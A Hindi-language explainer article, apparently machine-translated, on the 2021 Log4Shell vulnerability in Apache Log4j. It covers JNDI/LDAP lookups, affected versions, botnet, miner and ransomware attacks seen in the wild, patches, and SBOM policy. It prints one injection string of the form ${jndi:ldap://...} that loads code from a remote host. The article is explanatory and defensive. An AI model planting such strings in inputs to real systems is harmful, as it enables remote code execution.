विषय - सूची[छिपाना][प्रदर्शन]
नवंबर 2021 के अंत में, हमने साइबर सुरक्षा के लिए एक बड़े खतरे का खुलासा किया। यह शोषण संभावित रूप से दुनिया भर के लाखों कंप्यूटर सिस्टम को प्रभावित करेगा।
यह Log4j भेद्यता पर एक मार्गदर्शिका है और कैसे एक अनदेखी डिज़ाइन दोष ने दुनिया की 90% से अधिक कंप्यूटर सेवाओं पर हमला करने के लिए खुला छोड़ दिया है।
अपाचे लॉग4जे अपाचे सॉफ्टवेयर फाउंडेशन द्वारा विकसित एक ओपन-सोर्स जावा-आधारित लॉगिंग उपयोगिता है। मूल रूप से 2001 में सेकी गुल्कु द्वारा लिखा गया, यह अब अपाचे लॉगिंग सर्विसेज का हिस्सा है, जो अपाचे सॉफ्टवेयर फाउंडेशन की एक परियोजना है।
दुनिया भर की कंपनियां अपने एप्लिकेशन पर लॉगिंग सक्षम करने के लिए Log4j लाइब्रेरी का उपयोग करती हैं। वास्तव में, जावा लाइब्रेरी इतनी सर्वव्यापी है कि आप इसे अमेज़ॅन, माइक्रोसॉफ्ट, गूगल और अन्य के एप्लिकेशन में पा सकते हैं।
पुस्तकालय की प्रमुखता का अर्थ है कि कोड में कोई भी संभावित दोष लाखों कंप्यूटरों को हैकिंग के लिए खुला छोड़ सकता है। 24 नवंबर 2021 को, एक बादल सुरक्षा अलीबाबा के लिए काम कर रहे शोधकर्ता ने एक भयानक खामी की खोज की।
Log4j भेद्यता, जिसे Log4Shell के रूप में भी जाना जाता है, 2013 से किसी का ध्यान नहीं गया। भेद्यता ने दुर्भावनापूर्ण अभिनेताओं को Log4j चलाने वाले प्रभावित सिस्टम पर कोड चलाने की अनुमति दी। इसका सार्वजनिक खुलासा 9 दिसंबर, 2021 को किया गया
उद्योग विशेषज्ञ Log4Shell दोष कहते हैं हाल की स्मृति में सबसे बड़ी भेद्यता.
भेद्यता के प्रकाशन के बाद के सप्ताह में, साइबर सुरक्षा टीमों ने लाखों हमलों का पता लगाया। कुछ शोधकर्ताओं ने प्रति मिनट सौ से अधिक हमलों की दर भी देखी।
यह कैसे काम करता है?
यह समझने के लिए कि Log4Shell इतना खतरनाक क्यों है, हमें यह समझने की आवश्यकता है कि यह क्या करने में सक्षम है।
Log4Shell भेद्यता मनमाने ढंग से कोड निष्पादन की अनुमति देती है, जिसका मूल रूप से मतलब है कि एक हमलावर लक्ष्य मशीन पर कोई भी कमांड या कोड चला सकता है।
यह इसे कैसे पूरा करता है?
सबसे पहले, हमें यह समझने की जरूरत है कि जेएनडीआई क्या है।
जावा नेमिंग एंड डायरेक्ट्री इंटरफ़ेस (जेएनडीआई) एक जावा सेवा है जो जावा प्रोग्राम को एक नाम के माध्यम से डेटा और संसाधनों को खोजने और देखने की अनुमति देती है। ये निर्देशिका सेवाएँ महत्वपूर्ण हैं क्योंकि वे डेवलपर्स को एप्लिकेशन बनाते समय आसानी से संदर्भित करने के लिए रिकॉर्ड का एक व्यवस्थित सेट प्रदान करती हैं।
जेएनडीआई एक निश्चित निर्देशिका तक पहुंचने के लिए विभिन्न प्रोटोकॉल का उपयोग कर सकता है। इनमें से एक प्रोटोकॉल लाइटवेट डायरेक्ट्री एक्सेस प्रोटोकॉल या एलडीएपी है।
एक स्ट्रिंग लॉग करते समय, लॉग4जे जब उन्हें प्रपत्र की अभिव्यक्ति का सामना करना पड़ता है तो वे स्ट्रिंग प्रतिस्थापन करते हैं ${prefix:name}
.
उदाहरण के लिए, Text: ${java:version}
टेक्स्ट के रूप में लॉग किया जा सकता है: जावा संस्करण 1.8.0_65। इस प्रकार के प्रतिस्थापन आम बात हैं.
हम जैसे भाव भी रख सकते हैं Text: ${jndi:ldap://example.com/file}
जो एलडीएपी प्रोटोकॉल के माध्यम से यूआरएल से जावा ऑब्जेक्ट को लोड करने के लिए जेएनडीआई प्रणाली का उपयोग करता है।
यह उस यूआरएल से आने वाले डेटा को प्रभावी ढंग से मशीन में लोड करता है। कोई भी संभावित हैकर सार्वजनिक URL पर दुर्भावनापूर्ण कोड होस्ट कर सकता है और इसे लॉग करने के लिए Log4j का उपयोग करने वाली मशीनों की प्रतीक्षा कर सकता है।
चूंकि लॉग संदेशों की सामग्री में उपयोगकर्ता-नियंत्रित डेटा होता है, हैकर्स अपने स्वयं के जेएनडीआई संदर्भ डाल सकते हैं जो एलडीएपी सर्वर को इंगित करते हैं जिन्हें वे नियंत्रित करते हैं। ये एलडीएपी सर्वर दुर्भावनापूर्ण जावा ऑब्जेक्ट से भरे हो सकते हैं जिन्हें जेएनडीआई भेद्यता के माध्यम से निष्पादित कर सकता है।
इससे भी बदतर बात यह है कि इससे कोई फर्क नहीं पड़ता कि एप्लिकेशन सर्वर-साइड है या क्लाइंट-साइड एप्लिकेशन है।
जब तक लॉगर के पास हमलावर के दुर्भावनापूर्ण कोड को पढ़ने का कोई तरीका है, तब तक एप्लिकेशन शोषण के लिए खुला है।
कौन प्रभावित है?
भेद्यता उन सभी प्रणालियों और सेवाओं को प्रभावित करती है जो APache Log4j का उपयोग करते हैं, संस्करण 2.0 से लेकर 2.14.1 सहित।
कई सुरक्षा विशेषज्ञ सलाह देते हैं कि भेद्यता जावा का उपयोग करने वाले कई अनुप्रयोगों को प्रभावित कर सकती है।
यह खामी सबसे पहले माइक्रोसॉफ्ट के स्वामित्व वाले Minecraft वीडियो गेम में पाई गई थी। माइक्रोसॉफ्ट ने अपने उपयोगकर्ताओं से किसी भी जोखिम को रोकने के लिए अपने जावा संस्करण Minecraft सॉफ़्टवेयर को अपग्रेड करने का आग्रह किया है।
साइबर सिक्योरिटी एंड इंफ्रास्ट्रक्चर सिक्योरिटी एजेंसी (सीआईएसए) के निदेशक जेन ईस्टरली का कहना है कि विक्रेताओं के पास एक है प्रमुख जिम्मेदारी अंतिम उपयोगकर्ताओं को इस भेद्यता का फायदा उठाने वाले दुर्भावनापूर्ण अभिनेताओं से रोकने के लिए।
"विक्रेताओं को अपने ग्राहकों के साथ भी संवाद करना चाहिए ताकि यह सुनिश्चित किया जा सके कि अंतिम उपयोगकर्ताओं को पता चले कि उनके उत्पाद में यह भेद्यता है और उन्हें सॉफ़्टवेयर अपडेट को प्राथमिकता देनी चाहिए।"
कथित तौर पर हमले पहले ही शुरू हो चुके हैं। साइबर सुरक्षा सॉफ्टवेयर प्रदान करने वाली कंपनी सिमेंटेक ने विभिन्न संख्या में हमले के अनुरोध देखे हैं।
शोधकर्ताओं ने जिन प्रकार के हमलों का पता लगाया है, उनके कुछ उदाहरण यहां दिए गए हैं:
- botnets
बॉटनेट कंप्यूटरों का एक नेटवर्क है जो एक ही हमलावर पक्ष के नियंत्रण में होता है। वे DDoS हमले करने, डेटा चोरी करने और अन्य घोटाले करने में मदद करते हैं। शोधकर्ताओं ने Log4j एक्सप्लॉइट से डाउनलोड की गई शेल स्क्रिप्ट में मुहस्टिक बॉटनेट का अवलोकन किया।
- एक्सएमरिग माइनर ट्रोजन
एक्सएमरिग एक ओपन-सोर्स क्रिप्टोकरेंसी माइनर है जो मोनेरो टोकन को माइन करने के लिए सीपीयू का उपयोग करता है। साइबर अपराधी लोगों के उपकरणों पर एक्सएमरिग स्थापित कर सकते हैं ताकि वे उनकी जानकारी के बिना उनकी प्रसंस्करण शक्ति का उपयोग कर सकें।
- खोनसारी रैनसमवेयर
रैनसमवेयर एक प्रकार के मैलवेयर को संदर्भित करता है जिसके लिए डिज़ाइन किया गया है फ़ाइलों को एन्क्रिप्ट करें एक कंप्यूटर पर. फिर हमलावर एन्क्रिप्टेड फ़ाइलों तक पहुंच वापस देने के बदले में भुगतान की मांग कर सकते हैं। शोधकर्ताओं ने Log4Shell हमलों में खोनसारी रैंसमवेयर की खोज की। वे विंडोज़ सर्वर को लक्षित करते हैं और .NET फ्रेमवर्क का उपयोग करते हैं।
आगे क्या होता है?
विशेषज्ञों का अनुमान है कि Log4J भेद्यता के कारण उत्पन्न अराजकता को पूरी तरह से ठीक करने में महीनों या शायद साल भी लग सकते हैं।
इस प्रक्रिया में प्रत्येक प्रभावित सिस्टम को पैच किए गए संस्करण के साथ अपडेट करना शामिल है। भले ही इन सभी प्रणालियों को पैच कर दिया गया हो, फिर भी संभावित पिछले दरवाजे का खतरा मंडरा रहा है जो हैकर्स ने पहले ही उस विंडो में जोड़ दिया है जो सर्वर हमले के लिए खुले थे।
बहुत समाधान और शमन इस बग द्वारा अनुप्रयोगों का शोषण होने से रोकने के लिए मौजूद है। नए Log4j संस्करण 2.15.0-rc1 ने इस भेद्यता को कम करने के लिए विभिन्न सेटिंग्स बदल दीं।
जेएनडीआई का उपयोग करने वाली सभी सुविधाएं डिफ़ॉल्ट रूप से अक्षम कर दी जाएंगी और दूरस्थ लुकअप भी प्रतिबंधित कर दिया गया है। आपके Log4j सेटअप पर लुकअप सुविधा को अक्षम करने से संभावित शोषण के जोखिम को कम करने में मदद मिलेगी।
Log4j के बाहर, ओपन-सोर्स शोषण को रोकने के लिए अभी भी एक व्यापक योजना की आवश्यकता है।
इससे पहले मई में, व्हाइट हाउस ने एक जारी किया था कार्यकारी आदेश जिसका उद्देश्य राष्ट्रीय साइबर सुरक्षा में सुधार करना था। इसमें सामग्री के सॉफ़्टवेयर बिल (एसबीओएम) का प्रावधान शामिल था जो अनिवार्य रूप से एक औपचारिक दस्तावेज़ था जिसमें एप्लिकेशन बनाने के लिए आवश्यक प्रत्येक आइटम की एक सूची शामिल थी।
इसमें जैसे भाग शामिल हैं खुला स्रोत विकास के लिए उपयोग किए जाने वाले पैकेज, निर्भरताएं और एपीआई। यद्यपि एसबीओएम का विचार पारदर्शिता के लिए सहायक है, क्या यह वास्तव में उपभोक्ता की मदद करेगा?
निर्भरताओं को अपग्रेड करना बहुत अधिक परेशानी भरा हो सकता है। कंपनियां वैकल्पिक पैकेज ढूंढने में अतिरिक्त समय बर्बाद करने का जोखिम उठाने के बजाय कोई भी जुर्माना भरने का विकल्प चुन सकती हैं। शायद ये एसबीओएम तभी उपयोगी होंगे जब उनका क्षेत्र आगे तक सीमित है.
निष्कर्ष
Log4j समस्या संगठनों के लिए सिर्फ एक तकनीकी समस्या से कहीं अधिक है।
व्यावसायिक नेताओं को संभावित जोखिमों के बारे में पता होना चाहिए जो तब हो सकते हैं जब उनके सर्वर, उत्पाद या सेवाएँ उस कोड पर भरोसा करते हैं जिसे वे स्वयं बनाए नहीं रखते हैं।
ओपन-सोर्स और थर्ड पार्टी एप्लिकेशन पर भरोसा करना हमेशा कुछ जोखिम के साथ आता है। नए खतरे सामने आने से पहले कंपनियों को जोखिम कम करने की रणनीति पर काम करने पर विचार करना चाहिए।
अधिकांश वेब दुनिया भर में हजारों स्वयंसेवकों द्वारा बनाए गए ओपन-सोर्स सॉफ़्टवेयर पर निर्भर करता है।
यदि हम वेब को एक सुरक्षित स्थान बनाए रखना चाहते हैं, तो सरकारों और निगमों को ओपन सोर्स प्रयासों और साइबर सुरक्षा एजेंसियों जैसे फंडिंग में निवेश करना चाहिए सीआईएसए.
एक जवाब लिखें